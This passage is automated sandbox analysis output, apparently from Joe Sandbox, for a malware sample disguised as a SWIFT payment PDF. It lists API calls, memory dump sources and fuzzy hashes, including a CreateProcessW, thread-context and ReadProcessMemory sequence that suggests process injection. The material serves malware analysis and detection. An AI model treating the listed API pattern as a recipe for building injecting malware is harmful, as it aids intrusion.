                                                        • Opcode Fuzzy Hash: dda62e46bfe726ec08d2da4edb305482c5d49b6a6c5c86b03ff1868783609ec0
                                                        • Instruction Fuzzy Hash: 022158B260825067C724EF7A9C8266EF7D8AF85308F148C3FF554D2282F638D555879A
                                                        APIs
                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 03F22F45
                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03F22F69
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03F22F8B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1717761214.0000000003F21000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F21000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_3f21000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                        • String ID:
                                                        • API String ID: 2438371351-0
                                                        • Opcode ID: 9ff7d806dc6ef1cc8f26af8a7a5011723b62bd23310367b846ce676590f9e849
                                                        • Instruction ID: cbce12e4a611b24413be4e35f3c27d708fab882a8e666130f90d6649f3ecdcad
                                                        • Opcode Fuzzy Hash: 9ff7d806dc6ef1cc8f26af8a7a5011723b62bd23310367b846ce676590f9e849
                                                        • Instruction Fuzzy Hash: 6D620974A14218DBEB24CFA4CC50BDEB776EF58300F1091A9D10DEB294E77A9E81CB59
                                                        APIs
                                                        • _memset.LIBCMT ref: 0040E202
                                                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E2C7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: IconNotifyShell__memset
                                                        • String ID:
                                                        • API String ID: 928536360-0
                                                        • Opcode ID: a8f79553875ba5cd412c6e6f6aef719f94b94a7ff7df26053db2d04cf48d3506
                                                        • Instruction ID: 9c6d99eda8392314e00a4319cd3b9f491a6d528882fc0aac3328a2d60ab56ec1
                                                        • Opcode Fuzzy Hash: a8f79553875ba5cd412c6e6f6aef719f94b94a7ff7df26053db2d04cf48d3506
                                                        • Instruction Fuzzy Hash: FC318170608701DFD320DF25D845B97BBF8BB45304F00486EE99A93380E778A958CF5A
                                                        APIs
                                                        • _malloc.LIBCMT ref: 00411734
                                                          • Part of subcall function 004138BA: __FF_MSGBANNER.LIBCMT ref: 004138DD
                                                          • Part of subcall function 004138BA: __NMSG_WRITE.LIBCMT ref: 004138E4
                                                          • Part of subcall function 004138BA: RtlAllocateHeap.NTDLL(00000000,0041172A,?,?,?,?,00411739,?,00401C0B), ref: 00413931
                                                        • std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                          • Part of subcall function 004116B0: std::exception::exception.LIBCMT ref: 004116BC
                                                        • std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                        • __CxxThrowException@8.LIBCMT ref: 00411779
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                        • String ID:
                                                        • API String ID: 1411284514-0
                                                        • Opcode ID: ca7221cdd9cc9326792a0c346bb7c35cd30f9974032eaa45b6addcc39664c516
                                                        • Instruction ID: c554e94cc15d94fff19a40754e7570613bf3612ee9c26c673f8185df9075a277
                                                        • Opcode Fuzzy Hash: ca7221cdd9cc9326792a0c346bb7c35cd30f9974032eaa45b6addcc39664c516
                                                        • Instruction Fuzzy Hash: 6FF0E23550060A66CF08B723EC06ADE3B649F11798B10403BFA20552F2DF6DADC9865C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c2b84d901eedfcb5732c73c427cf3e6a40f349a1394e6728fcd5bdf3f2a5d4d9
                                                        • Instruction ID: a1f682be926937ece900e9fcc50ccc13891f43ead78ba7c6857800eee9f0599c
                                                        • Opcode Fuzzy Hash: c2b84d901eedfcb5732c73c427cf3e6a40f349a1394e6728fcd5bdf3f2a5d4d9
                                                        • Instruction Fuzzy Hash: EC81D2756043009FC310EF65C985B6AB7E4EF84315F008D2EF988AB392D779E909CB96
                                                        APIs
                                                        • RegOpenKeyExW.KERNELBASE(80000001,0040F0EE,00000000,00000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F132
                                                        • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,80000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F14F
                                                        • RegCloseKey.KERNELBASE(00000000,?,?,00000000,00000000,80000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F159
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: CloseOpenQueryValue
                                                        • String ID:
                                                        • API String ID: 3677997916-0
                                                        • Opcode ID: 2fc94d7b08a1a7677ebb25c0c676948635cded20fa34e442ec21f1e1bf5971ab
                                                        • Instruction ID: 6acd5c45b0bc896a902747136fbadff1bb775023c46fd22fba7b324c5144c726
                                                        • Opcode Fuzzy Hash: 2fc94d7b08a1a7677ebb25c0c676948635cded20fa34e442ec21f1e1bf5971ab
                                                        • Instruction Fuzzy Hash: 60F0BDB0204202ABD614DF54DD88E6BB7F9EF88704F10492DB585D7250D7B4A804CB26
                                                        APIs
                                                        • _malloc.LIBCMT ref: 00435278
                                                          • Part of subcall function 004138BA: __FF_MSGBANNER.LIBCMT ref: 004138DD
                                                          • Part of subcall function 004138BA: __NMSG_WRITE.LIBCMT ref: 004138E4
                                                          • Part of subcall function 004138BA: RtlAllocateHeap.NTDLL(00000000,0041172A,?,?,?,?,00411739,?,00401C0B), ref: 00413931
                                                        • _malloc.LIBCMT ref: 00435288
                                                        • _malloc.LIBCMT ref: 00435298
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: _malloc$AllocateHeap
                                                        • String ID:
                                                        • API String ID: 680241177-0
                                                        • Opcode ID: d11b1792ef3d24f06ef5636d78d46cf58a843b0d423fa777cd48d8e801ebef30
                                                        • Instruction ID: 30b75876ff52ae1c35022de4a6700901ba1db26c97f4d16f7fcf584af9a5a73f
                                                        • Opcode Fuzzy Hash: d11b1792ef3d24f06ef5636d78d46cf58a843b0d423fa777cd48d8e801ebef30
                                                        • Instruction Fuzzy Hash: E5F0A0B1500F0046E660AB3198457C7A2E09B14307F00186FB6855618ADA7C69C4CEAC
                                                        APIs
                                                        • _wcslen.LIBCMT ref: 00401B71
                                                          • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                          • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                          • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                          • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Exception@8Throw_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                        • String ID: @EXITCODE
                                                        • API String ID: 580348202-3436989551
                                                        • Opcode ID: 48d001a4b96ee351bc7679959485890c1c6d832d60c6cde5ea273d4c8ab31dfe
                                                        • Instruction ID: 288ad252d7dad0c090ff8240dee62855692e698d70424b42c0a66861a7771545
                                                        • Opcode Fuzzy Hash: 48d001a4b96ee351bc7679959485890c1c6d832d60c6cde5ea273d4c8ab31dfe
                                                        • Instruction Fuzzy Hash: 73F06DF2A002025BD7649B35DC0276776E4AB44704F18C83EE14AC7791F6BDE8829B15
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: __lock_file_memset
                                                        • String ID:
                                                        • API String ID: 26237723-0
                                                        • Opcode ID: c74911371e76cb9dc4786cfdbe28690debad29cef5acae8c4501fea9e7903076
                                                        • Instruction ID: c8a12bf2a45d0ac11074f8cac28b928f9e20b60047ac9024d749846706a082ab
                                                        • Opcode Fuzzy Hash: c74911371e76cb9dc4786cfdbe28690debad29cef5acae8c4501fea9e7903076
                                                        • Instruction Fuzzy Hash: 32012971C00609FBCF22AF65DC029DF3B31AF44714F04815BF82416261D7798AA2DF99
                                                        APIs
                                                          • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                          • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                        • __lock_file.LIBCMT ref: 00414EE4
                                                          • Part of subcall function 00415965: __lock.LIBCMT ref: 0041598A
                                                        • __fclose_nolock.LIBCMT ref: 00414EEE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: __decode_pointer__fclose_nolock__getptd_noexit__lock__lock_file
                                                        • String ID:
                                                        • API String ID: 717694121-0
                                                        • Opcode ID: 6051778e024176e7de16a1974b8d1b3b80c3b8a23747dfcb666cdf4e7799d8f6
                                                        • Instruction ID: 225a509e04b880138f2478077c57af59103cae2c072c29012e7845c0956b1514
                                                        • Opcode Fuzzy Hash: 6051778e024176e7de16a1974b8d1b3b80c3b8a23747dfcb666cdf4e7799d8f6
                                                        • Instruction Fuzzy Hash: DEF06270D0470499C721BB6A9802ADE7AB0AFC1338F21864FE479A72D1C77C46C29F5D
                                                        APIs
                                                        • TranslateMessage.USER32(?), ref: 004098F6
                                                        • DispatchMessageW.USER32(?), ref: 00409901
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Message$DispatchTranslate
                                                        • String ID:
                                                        • API String ID: 1706434739-0
                                                        • Opcode ID: 743ba5b075e4e96b6aa8f27e888cbbcb244a1ef3297f43ff84cf2107d4412f6a
                                                        • Instruction ID: 6b3a2aeb923af73eb4cdb1bab797699f2cf27729a5018e8568c19fb4e3feaf67
                                                        • Opcode Fuzzy Hash: 743ba5b075e4e96b6aa8f27e888cbbcb244a1ef3297f43ff84cf2107d4412f6a
                                                        • Instruction Fuzzy Hash: D4F05471114301AEDA24DBE58D41B5BB3A8AFD8700F408C2EBA51E61C1FBF8E404C76A
                                                        APIs
                                                        • TranslateMessage.USER32(?), ref: 004098F6
                                                        • DispatchMessageW.USER32(?), ref: 00409901
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Message$DispatchTranslate
                                                        • String ID:
                                                        • API String ID: 1706434739-0
                                                        • Opcode ID: fb629fc6ca96518639a0c0a81923e3da878f7f29ff55e6bd70df59113b88f2fd
                                                        • Instruction ID: cc4909b6a78c34842ee59a7900970f574117f06624f4f9c7373c79b1fb9dfc76
                                                        • Opcode Fuzzy Hash: fb629fc6ca96518639a0c0a81923e3da878f7f29ff55e6bd70df59113b88f2fd
                                                        • Instruction Fuzzy Hash: DDF054B1114301AADA14DBE58D41B5BB3A4AF94740F408C2EBA11E52C1EBFCD504C71A
                                                        APIs
                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 03F22F45
                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03F22F69
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03F22F8B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1717761214.0000000003F21000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F21000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_3f21000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                        • String ID:
                                                        • API String ID: 2438371351-0
                                                        • Opcode ID: 282d440d23347d33a5333bc70feb3b77e7ffa06fe9f8fdc76eda24defaf3804a
                                                        • Instruction ID: dadd2f04798304abd60ae2cb86cde6b88bc698d668d6ef7f28b43ed123214c33
                                                        • Opcode Fuzzy Hash: 282d440d23347d33a5333bc70feb3b77e7ffa06fe9f8fdc76eda24defaf3804a
                                                        • Instruction Fuzzy Hash: 2A12CF24E24658C6EB24DF64D8507DEB232EF68300F1094E9910DEB7A5E77A4F81CF5A
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: ProtectVirtual
                                                        • String ID:
                                                        • API String ID: 544645111-0
                                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                        • Instruction ID: fb1d736feddc8336b94c661b4f3a99b04f66f7614ca83ae43ac4a02a862e88ab
                                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                        • Instruction Fuzzy Hash: 1331D574A00105DFC718DF99E490AAAFBA6FB49304B2486A6E409CB751D774EDC1CBC5
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3961a28c277083be2aa3af59c567e925e17c7cc277bd15d9b1b027d84e9ba52e
                                                        • Instruction ID: 573dba848690e0cdfd4c9be45b5663ff9194aa529e9341154cf92adfcd841cf8
                                                        • Opcode Fuzzy Hash: 3961a28c277083be2aa3af59c567e925e17c7cc277bd15d9b1b027d84e9ba52e
                                                        • Instruction Fuzzy Hash: 5E11C374200200ABC7249FAAD8D5F2A73A5AF45304B244C6FE845E7392D73CEC81EB5E
                                                        APIs
                                                          • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                          • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                          • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                          • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                        • _memset.LIBCMT ref: 00452DE9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Exception@8Throw_malloc_memsetstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                        • String ID:
                                                        • API String ID: 2751567902-0
                                                        • Opcode ID: 30f2c1480e752f884e6c33289736b7ceb065697b9285b157237ebc9805b54d19
                                                        • Instruction ID: c2a3b2dfb6b158e2ccc1f5ef864fc4bb8e06cf4791c66092a4707409b716d428
                                                        • Opcode Fuzzy Hash: 30f2c1480e752f884e6c33289736b7ceb065697b9285b157237ebc9805b54d19
                                                        • Instruction Fuzzy Hash: 1101D7B92002409FD350EF1DC481B56B7E1FFA9304F25C95EE2898B392D776E846CB95
                                                        APIs
                                                        • DefWindowProcW.USER32(?,?,?,?), ref: 00401123
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: ProcWindow
                                                        • String ID:
                                                        • API String ID: 181713994-0
                                                        • Opcode ID: 2bcff8431ba1ff294e2b1c33dceaa93ee25f984dfbecb3b506615433fd530346
                                                        • Instruction ID: 72bdf1ad184d721e15e17473fba0dc1faec6c1a9a9d1f3fcb71c15abd8c9f185
                                                        • Opcode Fuzzy Hash: 2bcff8431ba1ff294e2b1c33dceaa93ee25f984dfbecb3b506615433fd530346
                                                        • Instruction Fuzzy Hash: FDF05436700118A7DF38995CE89ACFF632AD7ED350F418227FD152B3A6813C5C41966E
                                                        APIs
                                                        • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0041AA46
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: CreateHeap
                                                        • String ID:
                                                        • API String ID: 10892065-0
                                                        • Opcode ID: 715419928b85d2867e9ba06f33a68846dd0d9c70f7b25bc38942ce62b1fa172d
                                                        • Instruction ID: 99ddfbee892492b32903703907324a593b21f4d4a70cf9c354be63060b8faba1
                                                        • Opcode Fuzzy Hash: 715419928b85d2867e9ba06f33a68846dd0d9c70f7b25bc38942ce62b1fa172d
                                                        • Instruction Fuzzy Hash: 56D05E325543449EDF009F71AC087663FDCE788395F008836BC1CC6150E778C950CA08
                                                        APIs
                                                        • DefWindowProcW.USER32(?,?,?,?), ref: 00401123
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: ProcWindow
                                                        • String ID:
                                                        • API String ID: 181713994-0
                                                        • Opcode ID: 837c1f5b160989e4bc04331483680d437582dbd9ffcfcea34caefcb6c1da81af
                                                        • Instruction ID: 4c36cba44089d0e03573cc5e8dee84df23505be31ebc2729507753268ee0d302
                                                        • Opcode Fuzzy Hash: 837c1f5b160989e4bc04331483680d437582dbd9ffcfcea34caefcb6c1da81af
                                                        • Instruction Fuzzy Hash: C3C08C72100008BB8700DE04EC44CFBB72CEBD8310700C20BBC0586201C230885097A1
                                                        APIs
                                                        Memory Dump Source
